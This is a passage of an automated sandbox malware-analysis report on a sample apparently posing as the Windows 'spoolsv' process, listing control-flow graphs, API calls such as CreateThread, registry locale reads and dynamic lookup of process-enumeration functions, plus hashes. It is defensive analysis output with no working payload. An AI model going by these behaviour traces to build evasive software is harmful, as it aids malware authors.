                                                                                                        • Instruction Fuzzy Hash: AC11E670784320BFE314EF6AE605BAD7FE5E758304F90806AE00097391C6BE6D84DA1D

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 519 425c04-425c06 520 425bc8-425bcc 519->520 521 425c0c-425c11 519->521 523 425bce-425bdb SysFreeString 520->523 524 425bdc 520->524 521->520 522 425c17-425c21 SysReAllocStringLen 521->522 525 425c27 522->525 526 425b98-4261dc 522->526 523->524 528 4261f6 526->528 529 4261de-4261ee SysAllocStringLen 526->529 529->526 530 4261f4 529->530 530->528
                                                                                                        APIs
                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00425BD6
                                                                                                        • SysReAllocStringLen.OLEAUT32(-00000008,"lB,?), ref: 00425C1A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: String$AllocFree
                                                                                                        • String ID: "lB
                                                                                                        • API String ID: 344208780-2501005195
                                                                                                        • Opcode ID: e58d3e103b32321eede93fc9b886787ef9609421d2c87b51c43b450ca5e1a7fd
                                                                                                        • Instruction ID: 1ef83d56cbdf2652bb4066a39517635c9c34684a331697f53fb0bb73bc7ca3e4
                                                                                                        • Opcode Fuzzy Hash: e58d3e103b32321eede93fc9b886787ef9609421d2c87b51c43b450ca5e1a7fd
                                                                                                        • Instruction Fuzzy Hash: FAD012B43006216DEE149A25A901A372A7A9FD1722BE9864EB8019A245DA7CAC01962C

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 486 42342c-42343c 487 423447-42344d 486->487 488 42343e call 422bd0 486->488 490 423459-42346e 487->490 491 42344f-423454 487->491 492 423443-423445 488->492 494 423470-423475 RtlEnterCriticalSection 490->494 495 42347a-423483 490->495 493 4235cf-4235d6 491->493 492->487 492->491 494->495 496 423485 495->496 497 42348a-423490 495->497 496->497 498 423542-423548 497->498 499 423496-42349a 497->499 500 42354a-423557 498->500 501 42359d-42359f call 4232e4 498->501 502 42349f-4234b3 499->502 503 42349c 499->503 504 423566-42359b call 424e24 500->504 505 423559-423561 500->505 511 4235a4-4235bb 501->511 502->498 507 4234b9-4234d6 502->507 503->502 504->493 505->504 508 4234e6-42350a 507->508 509 4234d8-4234e4 507->509 512 42350c-42353d call 424e24 508->512 509->512 516 4235c7 511->516 517 4235bd-4235c2 RtlLeaveCriticalSection 511->517 512->493 517->516
                                                                                                        APIs
                                                                                                          • Part of subcall function 00422BD0: RtlInitializeCriticalSection.NTDLL(0051C5CC), ref: 00422BE7
                                                                                                          • Part of subcall function 00422BD0: RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422BFA
                                                                                                          • Part of subcall function 00422BD0: LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00422C98,?,00000000,?,004235F6,00000000), ref: 00422C24
                                                                                                          • Part of subcall function 00422BD0: RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422C92
                                                                                                        • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00423475
                                                                                                        • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 004235C2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                        • String ID:
                                                                                                        • API String ID: 2227675388-0
                                                                                                        • Opcode ID: a152c6f849179c42758c856f24fc3218e7e89dae70e758f92901cddfe6e35a0e
                                                                                                        • Instruction ID: 598cdeddc025ade9b9916cc483952d390fd687b2127ecc3d21840085fc418226
                                                                                                        • Opcode Fuzzy Hash: a152c6f849179c42758c856f24fc3218e7e89dae70e758f92901cddfe6e35a0e
                                                                                                        • Instruction Fuzzy Hash: 6F51A0B0B40315EFDB10CF68E9806AEBBF1FB58305F6081AAD40597351D339AA81CF49

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 486 42342c-42343c 487 423447-42344d 486->487 488 42343e call 422bd0 486->488 490 423459-42346e 487->490 491 42344f-423454 487->491 492 423443-423445 488->492 494 423470-423475 RtlEnterCriticalSection 490->494 495 42347a-423483 490->495 493 4235cf-4235d6 491->493 492->487 492->491 494->495 496 423485 495->496 497 42348a-423490 495->497 496->497 498 423542-423548 497->498 499 423496-42349a 497->499 500 42354a-423557 498->500 501 42359d-42359f call 4232e4 498->501 502 42349f-4234b3 499->502 503 42349c 499->503 504 423566-42359b call 424e24 500->504 505 423559-423561 500->505 511 4235a4-4235bb 501->511 502->498 507 4234b9-4234d6 502->507 503->502 504->493 505->504 508 4234e6-42350a 507->508 509 4234d8-4234e4 507->509 512 42350c-42353d call 424e24 508->512 509->512 516 4235c7 511->516 517 4235bd-4235c2 RtlLeaveCriticalSection 511->517 512->493 517->516
                                                                                                        APIs
                                                                                                          • Part of subcall function 00422BD0: RtlInitializeCriticalSection.NTDLL(0051C5CC), ref: 00422BE7
                                                                                                          • Part of subcall function 00422BD0: RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422BFA
                                                                                                          • Part of subcall function 00422BD0: LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00422C98,?,?,?,004235F6), ref: 00422C24
                                                                                                          • Part of subcall function 00422BD0: RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422C92
                                                                                                        • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00423475
                                                                                                        • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 004235C2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                        • String ID:
                                                                                                        • API String ID: 2227675388-0
                                                                                                        • Opcode ID: a152c6f849179c42758c856f24fc3218e7e89dae70e758f92901cddfe6e35a0e
                                                                                                        • Instruction ID: 598cdeddc025ade9b9916cc483952d390fd687b2127ecc3d21840085fc418226
                                                                                                        • Opcode Fuzzy Hash: a152c6f849179c42758c856f24fc3218e7e89dae70e758f92901cddfe6e35a0e
                                                                                                        • Instruction Fuzzy Hash: 6F51A0B0B40315EFDB10CF68E9806AEBBF1FB58305F6081AAD40597351D339AA81CF49

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 519 425c04-425c06 520 425bc8-425bcc 519->520 521 425c0c-425c11 519->521 523 425bce-425bdb SysFreeString 520->523 524 425bdc 520->524 521->520 522 425c17-425c21 SysReAllocStringLen 521->522 525 425c27 522->525 526 425b98-4261dc 522->526 523->524 528 4261f6 526->528 529 4261de-4261ee SysAllocStringLen 526->529 529->526 530 4261f4 529->530 530->528
                                                                                                        APIs
                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00425BD6
                                                                                                        • SysReAllocStringLen.OLEAUT32(?,?,?), ref: 00425C1A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: String$AllocFree
                                                                                                        • String ID:
                                                                                                        • API String ID: 344208780-0
                                                                                                        • Opcode ID: e58d3e103b32321eede93fc9b886787ef9609421d2c87b51c43b450ca5e1a7fd
                                                                                                        • Instruction ID: 1ef83d56cbdf2652bb4066a39517635c9c34684a331697f53fb0bb73bc7ca3e4
                                                                                                        • Opcode Fuzzy Hash: e58d3e103b32321eede93fc9b886787ef9609421d2c87b51c43b450ca5e1a7fd
                                                                                                        • Instruction Fuzzy Hash: FAD012B43006216DEE149A25A901A372A7A9FD1722BE9864EB8019A245DA7CAC01962C

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 531 415660-41573c 542 415742-415745 531->542 543 415d28-415d2f 531->543 542->543 544 41574b-415777 call 40ee70 542->544 551 4158e3-4158fc 544->551 552 41577d-415810 call 40ee70 544->552 557 4158fd-415909 call 40eab0 551->557 580 4158c7-4158e1 552->580 581 415816-415885 call 40ee70 call 40eab0 552->581 564 415912-415976 557->564 586 41597d-415982 564->586 580->557 581->543 646 41588b-4158a3 581->646 587 415a25-415a65 586->587 588 415988-415992 586->588 605 415a67-415a6e 587->605 588->543 591 415998-41599e 588->591 593 4159a0-4159cc 591->593 594 4159d7-4159d9 591->594 593->543 620 4159d2-4159d5 593->620 594->543 596 4159df-4159e2 594->596 596->543 598 4159e8-415a20 596->598 598->586 609 415b11-415b18 605->609 610 415a74-415a97 605->610 611 415b25-415b2b 609->611 612 415b1a-415b1f call 404c14 609->612 623 415a99-415a9d 610->623 624 415abd 610->624 611->543 614 415b31-415b59 611->614 612->611 614->543 621 415b5f 614->621 620->586 626 415b66-415b69 621->626 623->624 625 415a9f-415aad 623->625 629 415ac3-415ad9 624->629 625->629 630 415aaf-415abb 625->630 631 415b92-415b98 626->631 632 415b6b-415b87 626->632 634 415d23 629->634 635 415adf-415b04 629->635 630->629 631->543 637 415b9e-415bcf 631->637 632->543 648 415b8d-415b90 632->648 634->543 635->543 650 415b0a-415b0c 635->650 637->634 644 415bd5-415bed 637->644 656 415bfa-415c2e 644->656 657 415bef-415bf4 call 404c14 644->657 654 4158a5-4158a7 646->654 655 4158a9-4158ae 646->655 648->626 650->605 654->655 658 4158b1-4158b3 654->658 655->658 656->543 666 415c34-415c37 656->666 657->656 658->543 660 4158b9-4158bc 658->660 660->543 663 4158c2-4158c5 660->663 663->564 666->543 667 415c3d-415d0b 666->667
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0000
                                                                                                        • API String ID: 0-211534962
                                                                                                        • Opcode ID: 0adc0da8b6ac4ccf3f743cce2cbfe1a6654ea4958e7f599bc5796df7d377838d
                                                                                                        • Instruction ID: 53a986e52e39fbf970cbf615d3a1ec69ca294c6c8782ac2c6b5e72a9cd1184f1
                                                                                                        • Opcode Fuzzy Hash: 0adc0da8b6ac4ccf3f743cce2cbfe1a6654ea4958e7f599bc5796df7d377838d
                                                                                                        • Instruction Fuzzy Hash: C0122DB1E00248DFDB14DBE4DD89ADDBBB5FF88301F10412AE506A72A0DB745985CF59

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 684 427860-42786f 685 427871-427878 684->685 686 4278ae-4278b6 684->686 687 4278a4-4278a9 call 4256b4 685->687 688 42787a-42789d call 426d0c LoadStringA call 42559c 685->688 687->686 693 4278a2 688->693 693->686
                                                                                                        APIs
                                                                                                        • LoadStringA.USER32(00000000,0000FF84,?,00001000), ref: 00427892
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LoadString
                                                                                                        • String ID:
                                                                                                        • API String ID: 2948472770-0
                                                                                                        • Opcode ID: 8796358e6523dfde688f4884a08ea08aa8a30318939fa9443135e4f43c793457
                                                                                                        • Instruction ID: 22544c539b725ec5b4ac43c57f7f09c783e7cdc452e560019d01f461da980ed3
                                                                                                        • Opcode Fuzzy Hash: 8796358e6523dfde688f4884a08ea08aa8a30318939fa9443135e4f43c793457
                                                                                                        • Instruction Fuzzy Hash: B0F0A0727005209FCB10EA5DE8C2B8633DC4F4C348B548066B548CB359DB78CC44C7AA

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 684 427860-42786f 685 427871-427878 684->685 686 4278ae-4278b6 684->686 687 4278a4-4278a9 call 4256b4 685->687 688 42787a-42789d call 426d0c LoadStringA call 42559c 685->688 687->686 693 4278a2 688->693 693->686
                                                                                                        APIs
                                                                                                        • LoadStringA.USER32(00000000,0000FFF4,?,00001000), ref: 00427892
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LoadString
                                                                                                        • String ID:
                                                                                                        • API String ID: 2948472770-0
                                                                                                        • Opcode ID: 73449cd31783198abe0234b761cb9d43333b180b61f606bf4a20dae5c641b838
                                                                                                        • Instruction ID: 22544c539b725ec5b4ac43c57f7f09c783e7cdc452e560019d01f461da980ed3
                                                                                                        • Opcode Fuzzy Hash: 73449cd31783198abe0234b761cb9d43333b180b61f606bf4a20dae5c641b838
                                                                                                        • Instruction Fuzzy Hash: B0F0A0727005209FCB10EA5DE8C2B8633DC4F4C348B548066B548CB359DB78CC44C7AA

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 694 42545e-42549f call 423a80 CreateThread
                                                                                                        APIs
                                                                                                        • CreateThread.KERNEL32(?,?,Function_00004428,00000000,?,?), ref: 00425496
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: 983363b32a7dd6747033d111e2c59e60e1eba936680b0ce3877a97b211a9736e
                                                                                                        • Instruction ID: cc400aaec5f98775912378b72cba36d114b7af17ff567da94c7c96793c6a670b
                                                                                                        • Opcode Fuzzy Hash: 983363b32a7dd6747033d111e2c59e60e1eba936680b0ce3877a97b211a9736e
                                                                                                        • Instruction Fuzzy Hash: 5BE0C9B2301224BFD300DA5EAC44E9BBBECDFD9365B50C16AB90CC7221D5759C0186B4

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 694 42545e-42549f call 423a80 CreateThread
                                                                                                        APIs
                                                                                                        • CreateThread.KERNEL32(?,?,Function_00025428,00000000,?,?), ref: 00425496
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: 983363b32a7dd6747033d111e2c59e60e1eba936680b0ce3877a97b211a9736e
                                                                                                        • Instruction ID: cc400aaec5f98775912378b72cba36d114b7af17ff567da94c7c96793c6a670b
                                                                                                        • Opcode Fuzzy Hash: 983363b32a7dd6747033d111e2c59e60e1eba936680b0ce3877a97b211a9736e
                                                                                                        • Instruction Fuzzy Hash: 5BE0C9B2301224BFD300DA5EAC44E9BBBECDFD9365B50C16AB90CC7221D5759C0186B4

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 697 426cc4-426cd2 698 426cd4-426ceb GetModuleFileNameA call 426f58 697->698 699 426cff-426d0a 697->699 701 426cf0-426cf7 698->701 701->699 702 426cf9-426cfc 701->702 702->699
                                                                                                        APIs
                                                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00426CE2
                                                                                                          • Part of subcall function 00426F58: GetModuleFileNameA.KERNEL32(00000000,?,00000105,005080A8), ref: 00426F73
                                                                                                          • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426F91
                                                                                                          • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426FAF
                                                                                                          • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00426FCD
                                                                                                          • Part of subcall function 00426F58: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00427016
                                                                                                          • Part of subcall function 00426F58: RegQueryValueExA.ADVAPI32(?,004271D8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001), ref: 00427034
                                                                                                          • Part of subcall function 00426F58: RegCloseKey.ADVAPI32(?,00427063,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00427056
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 2796650324-0
                                                                                                        • Opcode ID: d03d703cfcffe0b58514ef675141cf11ad548282fe492436df931db8b4e2f126
                                                                                                        • Instruction ID: 33c73a500caeb01f155e44840a867e4305e698149c574fd086c8c5f59709d573
                                                                                                        • Opcode Fuzzy Hash: d03d703cfcffe0b58514ef675141cf11ad548282fe492436df931db8b4e2f126
                                                                                                        • Instruction Fuzzy Hash: D0E06D71A002249BCB10EE5C99C1A4733D8AF08754F4105A6BCA8CF34AD3B5DD1087E4

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 697 426cc4-426cd2 698 426cd4-426ceb GetModuleFileNameA call 426f58 697->698 699 426cff-426d0a 697->699 701 426cf0-426cf7 698->701 701->699 702 426cf9-426cfc 701->702 702->699
                                                                                                        APIs
                                                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00426CE2
                                                                                                          • Part of subcall function 00426F58: GetModuleFileNameA.KERNEL32(00000000,?,00000105,005080A8), ref: 00426F73
                                                                                                          • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426F91
                                                                                                          • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426FAF
                                                                                                          • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00426FCD
                                                                                                          • Part of subcall function 00426F58: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00427016
                                                                                                          • Part of subcall function 00426F58: RegQueryValueExA.ADVAPI32(?,004271D8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001), ref: 00427034
                                                                                                          • Part of subcall function 00426F58: RegCloseKey.ADVAPI32(?,00427063,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00427056
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 2796650324-0
                                                                                                        • Opcode ID: d03d703cfcffe0b58514ef675141cf11ad548282fe492436df931db8b4e2f126
                                                                                                        • Instruction ID: 33c73a500caeb01f155e44840a867e4305e698149c574fd086c8c5f59709d573
                                                                                                        • Opcode Fuzzy Hash: d03d703cfcffe0b58514ef675141cf11ad548282fe492436df931db8b4e2f126
                                                                                                        • Instruction Fuzzy Hash: D0E06D71A002249BCB10EE5C99C1A4733D8AF08754F4105A6BCA8CF34AD3B5DD1087E4

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 703 4cf5c8-4cf5d5 call 4cf34c 706 4cf5d7-4cf5e1 CreateToolhelp32Snapshot 703->706 707 4cf5e2-4cf5e6 703->707
                                                                                                        APIs
                                                                                                          • Part of subcall function 004CF34C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004CF5D3,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF360
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004CF378
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004CF38A
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004CF39C
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004CF3AE
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004CF3C0
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004CF3D2
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004CF3E4
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004CF3F6
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004CF408
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004CF41A
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 004CF42C
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 004CF43E
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 004CF450
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004CF462
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004CF474
                                                                                                          • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004CF486
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF5D9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 2242398760-0
                                                                                                        • Opcode ID: aa5b044c588ddfdc3210c4c3c0d3926e160f7f3b193a84c3919e26267408e9fe
                                                                                                        • Instruction ID: 2367da90766c253f4fab510a59415ecdd71ebaea341184a550cb27389e70fce3
